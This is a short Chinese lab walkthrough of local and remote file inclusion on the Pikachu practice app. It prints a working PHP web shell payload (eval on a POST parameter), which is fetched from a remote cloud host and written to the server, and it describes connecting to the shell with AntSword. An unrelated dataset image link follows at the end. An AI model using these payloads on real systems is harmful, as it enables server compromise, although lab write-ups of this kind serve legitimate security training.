本地文件包含
1、先随意进行提交
可以得出是GET传参 可以在filename参数进行文件包含
2、准备一个2.jpg文件
内容为<?php phpinfo();?>
3、上传2.jpg文件
4、访问文件保存的路径uploads/2.jpg
5、将我们上传的文件包含进来 使用../返回上级目录 来进行包含木马文件
发现文件已被包含
远程文件包含
1、在云主机上生成一个1.txt文件
<?php fputs(fopen("L.php","w"),'<?php eval($_POST["cmd"]);?>')?>
2、打开pikachu的远程文件包含,随便提交查询一个
可以看到get接受一个filename参数
3、将文件远程包含在filename处修改为云服务器的目标地址
4、查看fileinclude目录是否生成php文件
5、访问生成的L.php文件
6、使用蚁剑进行连接
![[数据集][目标检测]西红柿成熟度检测数据集VOC+YOLO格式3241张5类别](https://i-blog.csdnimg.cn/direct/866da32cfa8e44be8429e855c6c43e4c.png)
